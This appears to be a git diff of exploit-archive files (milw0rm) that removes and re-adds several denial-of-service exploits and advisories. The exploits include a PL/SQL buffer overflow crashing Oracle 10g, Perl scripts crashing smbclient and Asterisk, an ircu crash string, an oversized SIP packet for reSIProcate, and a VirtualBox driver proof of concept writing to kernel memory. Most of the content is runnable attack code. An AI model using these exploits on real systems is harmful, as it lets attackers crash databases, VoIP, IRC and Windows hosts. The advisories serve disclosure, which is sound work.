+ + + + + +----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] + +# milw0rm.com [2008-01-06] diff --git a/platforms/multiple/dos/4997.sql b/platforms/multiple/dos/4997.sql index 522b01b02..361d25455 100755 --- a/platforms/multiple/dos/4997.sql +++ b/platforms/multiple/dos/4997.sql @@ -1,56 +1,56 @@ -/******************************************************************/ -/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ -/******* BUFFER OVERFLOW *********/ -/******************************************************************/ -/************ POC exploit , Crash database **************/ -/******************************************************************/ -/****************** BY Sh2kerr (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: January 28, 2008 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ -/* Reported: 18 Dec 2007 */ -/* Date of Public Advisory: January 15, 2008 */ -/* Advisory: http://www.oracle.com/technology/deploy/ */ -/* security/critical-patch-updates/cpujan2008.html */ -/* */ -/******************************************************************/ -/* thanks to oraclefun for his pitrig_dropmetadata exploit */ -/* */ -/******************************************************************/ - - -set serveroutput on -declare - buff varchar2(32767); - begin - /* generate evil buffer */ - buff:='12345678901234567890123456789'; - buff:=buff||buff; - buff:=buff||buff; - buff:=buff||buff; - buff:=buff||buff; - buff:=buff||buff; - buff:=buff||'0012345678901234567890123sh2kerr'; - /* lets see the buffer size */ - dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff)); - xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff); - end; - / - - -/* P.S. xDb.XDB_PITRIG_PKG.PITRIG_DROP is also vulnerable */ - - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ -/******************************************************************/ - -// milw0rm.com [2008-01-28] +/******************************************************************/ +/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ +/******* BUFFER OVERFLOW *********/ +/******************************************************************/ +/************ POC exploit , Crash database **************/ +/******************************************************************/ +/****************** BY Sh2kerr (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: January 28, 2008 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ +/* Reported: 18 Dec 2007 */ +/* Date of Public Advisory: January 15, 2008 */ +/* Advisory: http://www.oracle.com/technology/deploy/ */ +/* security/critical-patch-updates/cpujan2008.html */ +/* */ +/******************************************************************/ +/* thanks to oraclefun for his pitrig_dropmetadata exploit */ +/* */ +/******************************************************************/ + + +set serveroutput on +declare + buff varchar2(32767); + begin + /* generate evil buffer */ + buff:='12345678901234567890123456789'; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||buff; + buff:=buff||'0012345678901234567890123sh2kerr'; + /* lets see the buffer size */ + dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff)); + xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff); + end; + / + + +/* P.S. xDb.XDB_PITRIG_PKG.PITRIG_DROP is also vulnerable */ + + +/******************************************************************/ +/*************************** SEE U LATER ;) ***********************/ +/******************************************************************/ + +// milw0rm.com [2008-01-28] diff --git a/platforms/multiple/dos/5268.html b/platforms/multiple/dos/5268.html index f5d5954bf..206b48ee3 100755 --- a/platforms/multiple/dos/5268.html +++ b/platforms/multiple/dos/5268.html @@ -1,39 +1,39 @@ - - - - Copyright Georgi Guninski -
- Cannot be used in vulnerability databases -
- Especially securityfocus/mitre/cve/cert - - - -# milw0rm.com [2008-03-17] + + + + Copyright Georgi Guninski +
+ Cannot be used in vulnerability databases +
+ Especially securityfocus/mitre/cve/cert + + + +# milw0rm.com [2008-03-17] diff --git a/platforms/multiple/dos/5306.txt b/platforms/multiple/dos/5306.txt index 145b90ff8..270436103 100755 --- a/platforms/multiple/dos/5306.txt +++ b/platforms/multiple/dos/5306.txt @@ -1,39 +1,39 @@ -Affected software ------------------ - -ircu (upto and including 2.10.12.12) -snircd (upto and including 1.3.4) -and many other ircu derivatives - -Vulnerability details ---------------------- - -send_user_mode in s_user.c does not check that the argument after a +r mode -is present, if it is not than the NULL sentinel may be missed, causing the -function to iterate over the boundary of the array. - -One possible exploit: -/mode nickname i i i i i i i i i i i i i i i r r r r s - -This won't work if there's another NULL directly after the first from the -previous parsed command, if this is the case one can just append more modes -or send some other junk to the ircd. - -Resolution ----------- - -Upgrade to the very latest version of ircu/snircd. - -Disclosure timeline -------------------- - -2008-03-15: Vulnerability discovered by QuakeNet and reported to Undernet. -2008-03-15: Patches released. -2008-03-17: Patches applied to public servers. -2008-03-24: Public disclosure. - --- -Chris Porter (slug on QuakeNet) -http://www.warp13.co.uk - -# milw0rm.com [2008-03-24] +Affected software +----------------- + +ircu (upto and including 2.10.12.12) +snircd (upto and including 1.3.4) +and many other ircu derivatives + +Vulnerability details +--------------------- + +send_user_mode in s_user.c does not check that the argument after a +r mode +is present, if it is not than the NULL sentinel may be missed, causing the +function to iterate over the boundary of the array. + +One possible exploit: +/mode nickname i i i i i i i i i i i i i i i r r r r s + +This won't work if there's another NULL directly after the first from the +previous parsed command, if this is the case one can just append more modes +or send some other junk to the ircd. + +Resolution +---------- + +Upgrade to the very latest version of ircu/snircd. + +Disclosure timeline +------------------- + +2008-03-15: Vulnerability discovered by QuakeNet and reported to Undernet. +2008-03-15: Patches released. +2008-03-17: Patches applied to public servers. +2008-03-24: Public disclosure. + +-- +Chris Porter (slug on QuakeNet) +http://www.warp13.co.uk + +# milw0rm.com [2008-03-24] diff --git a/platforms/multiple/dos/5679.php b/platforms/multiple/dos/5679.php index aa2c0b5d5..c870259ff 100755 --- a/platforms/multiple/dos/5679.php +++ b/platforms/multiple/dos/5679.php @@ -1,79 +1,79 @@ -There is some kind of issue in PHP -we can run out memory even on SAFE_MODE -script simply allocate maximum of memory -and go to sleep for, let's say 9999999 seconds. -sleep() pass 'max_execution_time' setting. - - - - - Ram eater sploit
-
-
-
- -
- - -# milw0rm.com [2008-05-27] +There is some kind of issue in PHP +we can run out memory even on SAFE_MODE +script simply allocate maximum of memory +and go to sleep for, let's say 9999999 seconds. +sleep() pass 'max_execution_time' setting. + + + + + Ram eater sploit
+
+
+
+ +
+ + +# milw0rm.com [2008-05-27] diff --git a/platforms/multiple/dos/5712.pl b/platforms/multiple/dos/5712.pl index 0322d44d9..b1d918524 100755 --- a/platforms/multiple/dos/5712.pl +++ b/platforms/multiple/dos/5712.pl @@ -1,23 +1,23 @@ -#!/usr/bin/perl -# 06/01/2008 - k`sOSe -# -# ~ # smbclient //localhost/w00t -# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 *** -# - -use warnings; -use strict; -use IO::Socket; - - -my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!); - -while(my $csock = $sock->accept()) -{ - print $csock "\x00" . - "\x01\xff\xff" . - "\x41" x 131071; - -} - -# milw0rm.com [2008-06-01] +#!/usr/bin/perl +# 06/01/2008 - k`sOSe +# +# ~ # smbclient //localhost/w00t +# *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 *** +# + +use warnings; +use strict; +use IO::Socket; + + +my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!); + +while(my $csock = $sock->accept()) +{ + print $csock "\x00" . + "\x01\xff\xff" . + "\x41" x 131071; + +} + +# milw0rm.com [2008-06-01] diff --git a/platforms/multiple/dos/5749.pl b/platforms/multiple/dos/5749.pl index 305b0724f..672ce4906 100755 --- a/platforms/multiple/dos/5749.pl +++ b/platforms/multiple/dos/5749.pl @@ -1,45 +1,45 @@ -#!/usr/bin/perl -w -############### - - -# asterisk AST-2008-008 -# by armando.j.m.o@gmail.com -#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode - -use Getopt::Std; -use IO::Socket; -use strict; - -my %args; -getopts("h:p:", \%args); - -if (!$args{h} || !$args{p}) { usage(); } - - -my $sock = IO::Socket::INET->new( - Proto => 'udp', - PeerPort => $args{p}, - PeerAddr => $args{h}, -) or die "Could not create socket: $!\n"; - -$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n -CSeq: 2 INVITE') or die "Send error: $!\n"; - - - - -sub usage { - print STDERR -qq{ $0 - -Usage: $0 -h -p - -h = host - -p = port - -Example: - $0 -h target -p port - - -}; - -# milw0rm.com [2008-06-05] +#!/usr/bin/perl -w +############### + + +# asterisk AST-2008-008 +# by armando.j.m.o@gmail.com +#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode + +use Getopt::Std; +use IO::Socket; +use strict; + +my %args; +getopts("h:p:", \%args); + +if (!$args{h} || !$args{p}) { usage(); } + + +my $sock = IO::Socket::INET->new( + Proto => 'udp', + PeerPort => $args{p}, + PeerAddr => $args{h}, +) or die "Could not create socket: $!\n"; + +$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n +CSeq: 2 INVITE') or die "Send error: $!\n"; + + + + +sub usage { + print STDERR +qq{ $0 + +Usage: $0 -h -p + -h = host + -p = port + +Example: + $0 -h target -p port + + +}; + +# milw0rm.com [2008-06-05] diff --git a/platforms/multiple/dos/6046.txt b/platforms/multiple/dos/6046.txt index 6210627c1..0c7f6f915 100755 --- a/platforms/multiple/dos/6046.txt +++ b/platforms/multiple/dos/6046.txt @@ -1,91 +1,91 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - -Remote DoS in reSIProcate [MU-200807-01] -July 10, 2008 - -http://labs.mudynamics.com/advisories.html - - -Affected Products/Versions: - -* repro SIP proxy/registrar 1.3.2 -http://www.resiprocate.org/ReSIProcate_1.3.2_Release - -* Any product using the reSIProcate SIP stack 1.3.2 may also be vulnerable. - - -Product Overview: - -http://www.resiprocate.org/ - -reSIProcate is a SIP stack. SIP is a protocol used for voice-over-IP -telephony. repro is a SIP proxy/registrar that uses the reSIProcate SIP stack. - - -Vulnerability Details: - -A malformed INVITE or OPTIONS message to the repro SIP proxy/registrar can -crash the process. The crash is caused by an assertion failure that occurs -when the domain name in the request line URI is too long -(rutil/dns/DnsStub.cxx, line 493). For example, the URI may be -"sip:bob@example.comAAAAAAA...", where "sip:bob@example.com" is followed by -256 As. To cause the crash, the address in the To header must be a valid -target address. - -Example invalid packet: - OPTIONS sip:bob@example.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SIP/2.0 - Via: SIP/2.0/UDP 127.0.0.1:54422;branch=z9hG4bKZqPsHMEiem;rport - To: "Bob" - From: "Alice" ;tag=W4eHvLYEQX - Call-ID: nO1DpTVfo4@mudynamics.com - CSeq: 1 OPTIONS - Contact: - Max-Forwards: 70 - Content-Length: 0 - - -Vendor Response / Solution: - -Update to 1.3.3, available from - https://www.resiprocate.org/files/pub/reSIProcate/releases/ - -This bug was also fixed by the reSIProcate development team in SVN on -April 23 (revision 7628). - - -History: - -July 1, 2008 - First contact with vendor -July 1, 2008 - Vendor acknowledges vulnerability -July 3, 2008 - Vendor releases 1.3.3 -July 10, 2008 - Advisory released - - -Mu-4000 vector: - -*.request-line.line.dsv.uri.body.string.append-overflow - - -Credit: - -This vulnerability was discovered by the Mu Dynamics research team. - -http://labs.mudynamics.com/pgpkey.txt - -Mu Dynamics offers a new class of security analysis system, delivering a -rigorous and streamlined methodology for verifying the robustness and security -readiness of any IP-based product or application. Founded by the pioneers of -intrusion detection and prevention technology, Mu Dynamics is backed by -preeminent venture capital firms that include Accel Partners, Benchmark -Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA. For -more information, visit the company's website at http://www.mudynamics.com. ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.7 (Darwin) - -iD8DBQFIdqOZQLdDlEyOXHQRAvt+AJsHGgqEVoiQi0Nb7ND9CR7HteZJpgCeMgKv -5lqpYSLdj7WBeXoD4l95+WA= -=KUQC ------END PGP SIGNATURE----- - -# milw0rm.com [2008-07-12] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + +Remote DoS in reSIProcate [MU-200807-01] +July 10, 2008 + +http://labs.mudynamics.com/advisories.html + + +Affected Products/Versions: + +* repro SIP proxy/registrar 1.3.2 +http://www.resiprocate.org/ReSIProcate_1.3.2_Release + +* Any product using the reSIProcate SIP stack 1.3.2 may also be vulnerable. + + +Product Overview: + +http://www.resiprocate.org/ + +reSIProcate is a SIP stack. SIP is a protocol used for voice-over-IP +telephony. repro is a SIP proxy/registrar that uses the reSIProcate SIP stack. + + +Vulnerability Details: + +A malformed INVITE or OPTIONS message to the repro SIP proxy/registrar can +crash the process. The crash is caused by an assertion failure that occurs +when the domain name in the request line URI is too long +(rutil/dns/DnsStub.cxx, line 493). For example, the URI may be +"sip:bob@example.comAAAAAAA...", where "sip:bob@example.com" is followed by +256 As. To cause the crash, the address in the To header must be a valid +target address. + +Example invalid packet: + OPTIONS sip:bob@example.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SIP/2.0 + Via: SIP/2.0/UDP 127.0.0.1:54422;branch=z9hG4bKZqPsHMEiem;rport + To: "Bob" + From: "Alice" ;tag=W4eHvLYEQX + Call-ID: nO1DpTVfo4@mudynamics.com + CSeq: 1 OPTIONS + Contact: + Max-Forwards: 70 + Content-Length: 0 + + +Vendor Response / Solution: + +Update to 1.3.3, available from + https://www.resiprocate.org/files/pub/reSIProcate/releases/ + +This bug was also fixed by the reSIProcate development team in SVN on +April 23 (revision 7628). + + +History: + +July 1, 2008 - First contact with vendor +July 1, 2008 - Vendor acknowledges vulnerability +July 3, 2008 - Vendor releases 1.3.3 +July 10, 2008 - Advisory released + + +Mu-4000 vector: + +*.request-line.line.dsv.uri.body.string.append-overflow + + +Credit: + +This vulnerability was discovered by the Mu Dynamics research team. + +http://labs.mudynamics.com/pgpkey.txt + +Mu Dynamics offers a new class of security analysis system, delivering a +rigorous and streamlined methodology for verifying the robustness and security +readiness of any IP-based product or application. Founded by the pioneers of +intrusion detection and prevention technology, Mu Dynamics is backed by +preeminent venture capital firms that include Accel Partners, Benchmark +Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA. For +more information, visit the company's website at http://www.mudynamics.com. +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.7 (Darwin) + +iD8DBQFIdqOZQLdDlEyOXHQRAvt+AJsHGgqEVoiQi0Nb7ND9CR7HteZJpgCeMgKv +5lqpYSLdj7WBeXoD4l95+WA= +=KUQC +-----END PGP SIGNATURE----- + +# milw0rm.com [2008-07-12] diff --git a/platforms/multiple/dos/6218.txt b/platforms/multiple/dos/6218.txt index 961be1f9a..9456b989e 100755 --- a/platforms/multiple/dos/6218.txt +++ b/platforms/multiple/dos/6218.txt @@ -1,401 +1,401 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - - Core Security Technologies - CoreLabs Advisory - http://www.coresecurity.com/corelabs/ - - - Sun xVM VirtualBox Privilege Escalation Vulnerability - - -*Advisory Information* - -Title: Sun xVM VirtualBox Privilege Escalation Vulnerability -Advisory ID: CORE-2008-0716 -Advisory URL: -http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability - -Date published: 2008-08-04 -Date of last update: 2008-08-04 -Vendors contacted: Sun Microsystems -Release mode: Coordinated release - - -*Vulnerability Information* - -Class: Insufficient input validation - -Remotely Exploitable: No -Locally Exploitable: Yes -Bugtraq ID: 30481 -CVE Name: CVE-2008-3431 - - -*Vulnerability Description* - -Virtualization technologies allow users to run different operating -systems simultaneously on top of the same set of underlying physical - -hardware. This provides several benefits to end users and organizations, -including efficiency gains in the use of hardware resources, reduction -of operational costs, dynamic re-allocation of computing resources and - -rapid deployment and configuration of software development and testing -environments. - -VirtualBox is an open source virtualization technology project -originally developed by Innotek, a software company based in Germany. - - -In February 2008 Sun Microsystems announced the acquisition of Innotek -[1] and VirtualBox was integrated into Sun's xVM family of -virtualization technologies. In May 2008, Sun Microsystems announced -that the number of downloads of the open source VirtualBox software - -package passed the five million mark [2]. - -When used on a Windows Host Operating System VirtualBox installs a -kernel driver ('VBoxDrv.sys') to control virtualization of guest -Operating Systems. - - -An input validation vulnerability was discovered within VirtualBox's -'VBoxDrv.sys' driver that could allow an attacker, with local but -un-privileged access to a host where VirtualBox is installed, to execute - -arbitrary code within the kernel of the Windows host operating system -and to gain complete control of a vulnerable computer system. - - -*Vulnerable Packages* - -. Sun xVM VirtualBox 1.6.2. - -. Sun xVM VirtualBox 1.6.0. -. This issue only occurs in the Microsoft Windows versions of xVM -VirtualBox. - - -*Non-vulnerable Packages* - -. Sun xVM VirtualBox 1.6.4 (for Microsoft Windows) - - - -*Vendor Information, Solutions and Workarounds* - -No workarounds exist for this issue. A security bulletin from the vendor -that describes this issue is available here: -http://sunsolve.sun.com/search/document.do?assetkey=1-66-240095-1. - - - -*Credits* - -This vulnerability was discovered and researched by Anibal Sacco from -the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies. - - -*Technical Description / Proof of Concept Code* - - -When the VirtualBox package is installed on a host the 'VBoxDrv.sys' -driver is loaded on the machine. This driver allows any unprivileged -user to open the device '\\.\VBoxDrv' and issue IOCTLs with a buffering - -mode of METHOD_NEITHER without any kind of validation. This allows -untrusted user mode code to pass arbitrary kernel addresses as arguments -to the driver. - -With specially constructed input, a malicious user can use functionality - -within the driver to patch kernel addresses and execute arbitrary code -in kernel mode. When handling IOCTLs a communication method must be -pre-defined between the user-mode application and the driver module. The - -selected method will determine how the I/O Manager manipulates memory -buffers used in the communication. - -The 'METHOD_NEITHER' is a very dangerous method because the pointer -passed to 'DeviceIoControl' as input or output buffer will be sent - -directly to the driver, thus transferring it the responsibility of doing -the proper checks to validate the addresses sent from user mode. - -The 'VBoxDrv.sys' driver uses the 'METHOD_NEITHER' communication method - -when handling IOCTLs request and does not validate properly the buffer -sent in the Irp object allowing an attacker to write to any memory -address in the kernel-mode. - -Let's see the bug on the source. This is the function used to handle the - -IOCTL requests at 'SUPDrv-win.cpp'. - -/----------- - - NTSTATUS _stdcall VBoxDrvNtDeviceControl(PDEVICE_OBJECT pDevObj, PIRP -pIrp) - { - PSUPDRVDEVEXT pDevExt = (PSUPDRVDEVEXT)pDevObj->DeviceExtension; - - PIO_STACK_LOCATION pStack = IoGetCurrentIrpStackLocation(pIrp); - PSUPDRVSESSION pSession = -(PSUPDRVSESSION)pStack->FileObject->FsContext; - - /* - * Deal with the two high-speed IOCtl that takes it's arguments from - - * the session and iCmd, and only returns a VBox status code. - */ - ULONG ulCmd = pStack->Parameters.DeviceIoControl.IoControlCode; - if ( ulCmd == SUP_IOCTL_FAST_DO_RAW_RUN -(1) || ulCmd == SUP_IOCTL_FAST_DO_HWACC_RUN - - || ulCmd == SUP_IOCTL_FAST_DO_NOP) - { - KIRQL oldIrql; - int rc; - - /* Raise the IRQL to DISPATCH_LEVEl to prevent Windows from -rescheduling us to another CPU/core. */ - Assert(KeGetCurrentIrql() <= DISPATCH_LEVEL); - - KeRaiseIrql(DISPATCH_LEVEL, &oldIrql); -(2) rc = supdrvIOCtlFast(ulCmd, pDevExt, pSession); - KeLowerIrql(oldIrql); - - /* Complete the I/O request. */ - NTSTATUS rcNt = pIrp->IoStatus.Status = STATUS_SUCCESS; - - pIrp->IoStatus.Information = sizeof(rc); - __try - { -(3) *(int *)pIrp->UserBuffer = rc; - } - __except(EXCEPTION_EXECUTE_HANDLER) - { - rcNt = pIrp->IoStatus.Status = GetExceptionCode(); - - dprintf(("VBoxSupDrvDeviceContorl: Exception Code %#x\n", rcNt)); - } - IoCompleteRequest(pIrp, IO_NO_INCREMENT); - return rcNt; - } - - return VBoxDrvNtDeviceControlSlow(pDevExt, pSession, pIrp, pStack); - - } - -- -----------/ - -At (1), we can see the sentence checking the IOCTL code. The constants -use are defined at 'SUPDrvIOC.h' in this way: - -/----------- - -#define SUP_IOCTL_FAST_DO_RAW_RUN SUP_CTL_CODE_FAST(64) - -/** Fast path IOCtl: VMMR0_DO_HWACC_RUN */ -#define SUP_IOCTL_FAST_DO_HWACC_RUN SUP_CTL_CODE_FAST(65) -/** Just a NOP call for profiling the latency of a fast ioctl call to -VMMR0. */ -#define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66) - - -- -----------/ - -With the macro 'SUP_CTL_CODE_FAST()' defined in the same file: - -/----------- - -#define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, -(Function) - | SUP_IOCTL_FLAG, METHOD_NEITHER, - - FILE_WRITE_ACCESS) - -- -----------/ - -Now we know that the communication method used will be 'METHOD_NEITHER ' -(this could also be easily seen by looking at the resulting IOCTL code - -in the disassembled binary). - -Then at (2) the value returned by 'supdrvIOCtlFast()' is saved in 'rc' -and this is where the problem starts because at (3), the value in 'rc' -is written directly to the buffer pointer sent from usermode without any - -check to validate that it is really pointing to an usermode address or -even a valid one. - -In this scenario, it is possible to feed the IOCTL with kernel addresses -to write the value returned by 'supdrvIOCtlFast()' ANY address in kernel - -space memory as many times as necessary to modify kernel code or kernel -pointers to subsequently get code execution in ring 0 context (that -means, with system privileges). - -This is the Proof of Concept I have made to trigger and show the - -vulnerability. This will generate a Blue Screen of Death (BSOD) trying -to write to an unpaged kernel mode address (0x80808080) but any other -arbitrary address could be used. - -/----------- - -// Author: Anibal Sacco (aLS) - -// Contact: anibal.sacco@coresecurity.com -// anibal.sacco@gmail.com -// Organization: Core Security Technologies - - -#include -#include - -int main(int argc, char **argv) -{ - HANDLE hDevice; - DWORD cb; - char szDevice[] = "\\\\.\\VBoxDrv"; - - if ( (hDevice = CreateFileA(szDevice, - - GENERIC_READ|GENERIC_WRITE, - 0, - 0, - OPEN_EXISTING, - 0, - NULL) ) != INVALID_HANDLE_VALUE ) - - { - printf("Device %s succesfully opened!\n", szDevice); - } - else - { - printf("Error: Error opening device %s\n",szDevice); - } - - cb = 0; - if (!DeviceIoControl(hDevice, - - 0x228103, - (LPVOID)0x80808080,0, - (LPVOID)0x80808080,0x0, - &cb, - NULL)) - { - printf("Error in DeviceIo ... bytes returned %#x\n",cb); - } -} - - -- -----------/ - - -*Report Timeline* - -. 2008-07-16: Core Security Technologies notifies the VirtualBox team of -the vulnerability. -. 2008-07-17: Vendor acknowledges notification. -. 2008-07-29: Core asks the vendor for a status update in the fixing - -process. -. 2008-07-30: Vendor notifies a patched version will be publicly -available on Monday 4th, August. -. 2008-07-31: Core asks the vendor to provide URL to their alert and to -confirm which versions are vulnerable and which version will include the - -fix. -. 2008-07-31: CVE ID request sent to Mitre. -. 2008-07-31: Bugtraq ID request sent to SecurityFocus.com. -. 2008-07-31: CVE ID received from Mitre. -. 2008-07-31: Bugtraq ID received SecurityFocus.com. -. 2008-08-01: Vendor provides draft version of Sun Alert and URL to - -reference it. -. 2008-08-01: Core updates its security advisory with information about -vulnerable and non-vulnerable packages. Core provides its URL to the -vendor and indicates that the vendor cataloged the issue as a Denial of - -Service bug but it should be considered a privilege escalation problem -since it allows unprivileged users to execute code in the kernel context. -. 2008-08-04: Vendor confirms that this issue can lead to arbitrary code - -execution by an unprivileged user. -. 2008-08-04: CORE-2008-0716 advisory is published. - - -*References* - -[1] Sun Welcomes Innotek - http://www.sun.com/software/innotek/. - -[2] http://www.sun.com/aboutsun/pr/2008-05/sunflash.20080529.1.xml. - - -*About CoreLabs* - -CoreLabs, the research center of Core Security Technologies, is charged - -with anticipating the future needs and requirements for information -security technologies. We conduct our research in several important -areas of computer security including system vulnerabilities, cyber -attack planning and simulation, source code auditing, and cryptography. - -Our results include problem formalization, identification of -vulnerabilities, novel solutions and prototypes for new technologies. -CoreLabs regularly publishes security advisories, technical papers, -project information and shared software tools for public use at: - -http://www.coresecurity.com/corelabs/. - - -*About Core Security Technologies* - -Core Security Technologies develops strategic solutions that help -security-conscious organizations worldwide develop and maintain a - -proactive process for securing their networks. The company's flagship -product, CORE IMPACT, is the most comprehensive product for performing -enterprise security assurance testing. CORE IMPACT evaluates network, - -endpoint and end-user vulnerabilities and identifies what resources are -exposed. It enables organizations to determine if current security -investments are detecting and preventing attacks. Core Security -Technologies augments its leading technology solution with world-class - -security consulting services, including penetration testing and software -security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core -Security Technologies can be reached at 617-399-6980 or on the Web at - -http://www.coresecurity.com. - - -*Disclaimer* - -The contents of this advisory are copyright (c) 2008 Core Security -Technologies and (c) 2008 CoreLabs, and may be distributed freely - -provided that no fee is charged for this distribution and proper credit -is given. - - -*GPG/PGP Keys* - -This advisory has been signed with the GPG key of Core Security -Technologies advisories team, which is available for download at - -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. - ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.7 (MingW32) - -Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org - -iD8DBQFIl2jIyNibggitWa0RAtj0AJ9HSRe3Hq+SCqU0RfU2LwaxINL1NwCdH5p+ -md6p6ZKbhrc7SfaD6EsxjoA= -=kQyV ------END PGP SIGNATURE----- - -# milw0rm.com [2008-08-10] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + + Core Security Technologies - CoreLabs Advisory + http://www.coresecurity.com/corelabs/ + + + Sun xVM VirtualBox Privilege Escalation Vulnerability + + +*Advisory Information* + +Title: Sun xVM VirtualBox Privilege Escalation Vulnerability +Advisory ID: CORE-2008-0716 +Advisory URL: +http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability + +Date published: 2008-08-04 +Date of last update: 2008-08-04 +Vendors contacted: Sun Microsystems +Release mode: Coordinated release + + +*Vulnerability Information* + +Class: Insufficient input validation + +Remotely Exploitable: No +Locally Exploitable: Yes +Bugtraq ID: 30481 +CVE Name: CVE-2008-3431 + + +*Vulnerability Description* + +Virtualization technologies allow users to run different operating +systems simultaneously on top of the same set of underlying physical + +hardware. This provides several benefits to end users and organizations, +including efficiency gains in the use of hardware resources, reduction +of operational costs, dynamic re-allocation of computing resources and + +rapid deployment and configuration of software development and testing +environments. + +VirtualBox is an open source virtualization technology project +originally developed by Innotek, a software company based in Germany. + + +In February 2008 Sun Microsystems announced the acquisition of Innotek +[1] and VirtualBox was integrated into Sun's xVM family of +virtualization technologies. In May 2008, Sun Microsystems announced +that the number of downloads of the open source VirtualBox software + +package passed the five million mark [2]. + +When used on a Windows Host Operating System VirtualBox installs a +kernel driver ('VBoxDrv.sys') to control virtualization of guest +Operating Systems. + + +An input validation vulnerability was discovered within VirtualBox's +'VBoxDrv.sys' driver that could allow an attacker, with local but +un-privileged access to a host where VirtualBox is installed, to execute + +arbitrary code within the kernel of the Windows host operating system +and to gain complete control of a vulnerable computer system. + + +*Vulnerable Packages* + +. Sun xVM VirtualBox 1.6.2. + +. Sun xVM VirtualBox 1.6.0. +. This issue only occurs in the Microsoft Windows versions of xVM +VirtualBox. + + +*Non-vulnerable Packages* + +. Sun xVM VirtualBox 1.6.4 (for Microsoft Windows) + + + +*Vendor Information, Solutions and Workarounds* + +No workarounds exist for this issue. A security bulletin from the vendor +that describes this issue is available here: +http://sunsolve.sun.com/search/document.do?assetkey=1-66-240095-1. + + + +*Credits* + +This vulnerability was discovered and researched by Anibal Sacco from +the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies. + 